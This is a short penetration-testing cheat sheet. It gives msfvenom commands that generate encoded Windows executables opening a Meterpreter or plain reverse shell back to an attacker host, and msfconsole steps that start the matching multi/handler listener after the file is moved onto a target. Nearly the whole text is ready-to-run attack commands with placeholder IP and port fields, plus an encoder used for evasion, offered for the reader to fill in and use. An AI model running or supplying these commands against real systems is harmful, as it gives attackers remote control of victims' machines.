Use this command to create a Windows Meterpreter reverse shell: 

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACK-IP] LPORT=[PORT] -f exe -o [FILE.exe]


Once the payload has been created, transfer the file to target machine and start the listener on attack machine.



To start the listener on the attack machine:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST [attack-ip] 
set LPORT [listening-port] 
run

Another way to generate a reverse shell as an Windows executable:
msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACK-IP] LPORT=[PORT] -e x86/shikata_ga_nai -f exe-service -o [FILE.exe]



************************************************************************************************************************
* [Square Brackets] indicate changeable fields, tailor them to your use case. Remove the brackets for this to function *
************************************************************************************************************************
